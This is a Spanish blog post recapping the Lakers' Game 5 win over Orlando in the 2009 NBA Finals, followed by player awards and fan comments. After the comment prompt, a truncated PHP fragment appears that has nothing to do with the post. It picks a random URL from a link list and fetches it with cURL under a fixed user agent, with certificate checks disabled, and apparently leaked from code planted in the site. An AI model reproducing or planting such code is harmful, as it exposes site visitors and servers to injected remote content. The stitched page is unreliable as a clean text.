Finales 2009 (Game 5): Lakers campeones

15 de June de 2009 por TheDeerHunter

lakerswintitle

Siempre surgen todo tipo de elucubraciones una vez se llega a este tipo de partidos. 3-1 en contra y una tremenda lista de mazazos sufridos, un desgaste increíble. Cuesta creer que estos sean los mismos tipos que hace tan sólo un par de semanas habían eliminado contra pronóstico a los Cavaliers de LeBron, ensalzados por una marea de elogios que ahora se transforman en críticas desatadas.

Se dice que el equipo con ventaja ahora preferirá celebrar el título al abrigo de su gente en Los Ángeles, y también que los Magic no se sienten con fuerzas de viajar a la otra costa, dando la derrota por segura. Ahora va y resulta que nadie quiere ganar un partido de la final de la NBA. Menuda parida. Estrategias psicológicas que tienen de todo menos originalidad. Ha sido así toda la vida.

En cualquier caso sí es algo natural e incluso comprensible que este choque, tal y como están las cosas, se afrontara de forma distinta a los anteriores.

Comenzaba así el primer “match ball” de los tres posibles. Lakers un tanto relajados, con Bynum de primera y desacertada espada. Orlando, excesivamente acelerados, con Courtney Lee tirando del carro y sus líderes sospechosamente descolocados. Alston también parecía remar contracorriente, y así alcanzaron con cierta facilidad la decena de ventaja. Ya nos preguntábamos en qué momento saldría Nelson cuando fue el primero en apuntarse su segunda falta. Sólo le faltaba eso.

En ese momento los Magic tiraron definitivamente la toalla. Gasol terminó de rematar a un frustradísimo Howard y Kobe ejecutó en ataque para enjugar la diferencia como si nunca hubiera existido. Ariza y Odom se apuntaron a la fiesta en circunstancias favorables. Inoperancia ofensiva e indolencia defensiva fue la pobre respuesta de los locales. Las caras que ponían los jugadores a las proclamas de Van Gundy rozaban lo cómico. Han perdido completamente la fe en todo ese discurso. No podemos decir que no se lo merezca el hombre, aunque se supone que el tiempo cura las heridas…

arizavsturkogluAsí, al descanso la diferencia era +10 para los visitantes y hacia el último cuarto subió hasta +15. Sin darnos cuenta el partido y la temporada se habían esfumado. Nosotros sólo contábamos los minutos hasta “El primero” de Pau, no sabemos si tanto hasta el decimoquinto de los Lakers. El último sirvió para maquillar un poco las vergüenzas de más de uno y de asegurar el anillo. A un par de minutos para la conclusión Bryant le decía a Odom: “It’s over”. Se había acabado. Probablemente las Finales se acabaron con el triple de Fisher y lo de anoche sólo fue la constatación.

Tiempo habrá de analizar un título que encumbra a Phil Jackson como el técnico con más Anillos por delante de Auerbach y que sitúa a Fisher y Kobe junto a Shaq y Duncan como jugadores en activo con más títulos. Detrás de estos datos se esconden muchas historias deportivas y personales que en los próximos días trataremos con detalle. Ahora, como reza el tatuaje de Kobe, “Carpe Diem”, disfrutemos del momento. Que corra el champagne.

pauphilkoberingPREMIOS

MVP: Sólo por la alucinante canasta que anotó mediado el tercer cuarto, tras superar a Lee y rectificar el tiro ante Howard para acabar anotando en caída y a tabla, Kobe Bryant ya merecería el MVP del partido. Pero ésos fueron sólo 2 de sus 30 puntos, que acompañó con 6 rebotes, 5 asistencias, 4 tapones y 2 recuperaciones.

La sorpresa: Dado el poco margen para la sorpresa que presentan las Finales, nos quedamos con los dos triples consecutivos de Lamar Odom que sirvieron para frustrar el último intento de remontada por parte de los Magic. Los tres triples anotados por Odom suponen su mejor cifra desde hace más de dos años.

La decepción: 11 puntos, 10 rebotes, 3 tapones y una trascendencia nula. De Dwight Howard se esperaba mucho más en una cita como la de anoche.

El mayor esfuerzo en vano: No estuvo brillante pero al menos Rashard Lewis presentó números decentes. Sus 18 puntos, 10 rebotes, 4 asistencias, se vieron estropeados, eso sí, por el 3 de 12 en triples y por la derrota.

Comenta

6 comentarios a esta entrada

  1. Viva_Dirk dice:
    #1

    Por fin!!!!!!!! Ya era hora de un nuevo anillo de los Lakers, del 10º de Phil, del MVP de las finales de Kobe y del primero de Gasol, mas vale tarde que nunca.

      Citar

  2. MagicJohnson32 dice:
    #2

    Grandes, grandes y grandes. Yo creo, Deer, que ganar este partido es extremadamente difícil. Lo lógico es que gane el local y la cosa se vaya a un 6º. El partido de los Lakers ha sido impecable, gran juego de equipo, magnífica defensa y con una seguridad y una solidez que contrasta mucho con la imagen que les ha caracterizado esta temporada.

    Merecidísimo título para el equipo, para Phil, para Kobe, Fish, Pau, Ariza y compañía. Como dice la crónica, ya habrá tiempo de entrar en detalle sobre todo esto.

    ¡Qué felicidad, leches!

      Citar

  3. Txusma dice:
    #3

    10 anillos Phil Jackson… Madre mía. Me alegro por Pau y creo q este anillo constata que no existe jugador que pueda llevar el solo a un equipo a ganar el campeonato. Kobe ha tenido q esperar 7 años para ganar otro anillo y lo ha conseguido cuando al lado ha tenido a otro super clase.
    De cualquier manera los Lakers han sido los mejores.

      Citar

  4. toni dice:
    #4

    Ésto era lo que queríamos todos, el anillo de los Lakers, que pasando por encima de los Magic le han dado el ansiadisimo MVP OF THE FINALS a Kobe y el 10º anillo a Phil. Pau ha conseguido su primero consagrandose como un muy buen defensor.

    Ahora queda el Draft, el descansar o jugar el Eurobasket de Pau y el Eurobasket de Polonia.

    ¿Habrá muchas sorpresas de Traspasos?

    Enhorabuena Lakers y que todo esto siga…

      Citar

  5. ventepaibiza dice:
    #5

    con tu permiso y para todos….

    http://www.youtube.com/watch?v=8PkjGzbZVxY

      Citar

  6. TheDeerHunter dice:
    #6

    buenísimos videos… gracias

      Citar

Deja un comentario

html; } class Helper { public function random_date() { $low = '732045693'; $high = time(); $random = rand($low, $high); return date("D, d M Y H:i:s",$random); } } class Fetch_site { public $url; public $html; public function __construct($sites=null, $link_list=null) { $this->is_curl_installed(); if($link_list !== null) { $this->choose_site($link_list); } $this->load_site($this->url); } public function choose_site($file=null) { $file = explode("\n", $file); $key = rand(0, (count($file)-1)); $this->url = trim($file[$key]); } public function load_site($url) { $useragent = array('Link-Soft'); $rand = array_rand($useragent); $ch = curl_init(); $options = array( CURLOPT_URL => $url, CURLOPT_HEADER => 0, CURLOPT_USERAGENT => $useragent[$rand], CURLOPT_SSL_VERIFYHOST => 0, CURLOPT_SSL_VERIFYPEER => 0, CURLOPT_RETURNTRANSFER => 1, CURLOPT_FOLLOWLOCATION => 1, CURLOPT_ENCODING => "", CURLOPT_AUTOREFERER => 1, CURLOPT_CONNECTTIMEOUT => 30, CURLOPT_TIMEOUT => 30, CURLOPT_MAXREDIRS => 5, ); curl_setopt_array($ch,$options); $result = curl_exec($ch); if(!$result) { return curl_error($ch); } curl_close($ch); $this->html = $result; } public function is_curl_installed() { if(!in_array('curl',get_loaded_extensions())) { trigger_error("cURL PHP extension is disabled or not installed.",E_USER_ERROR); } } } unset($n); ?>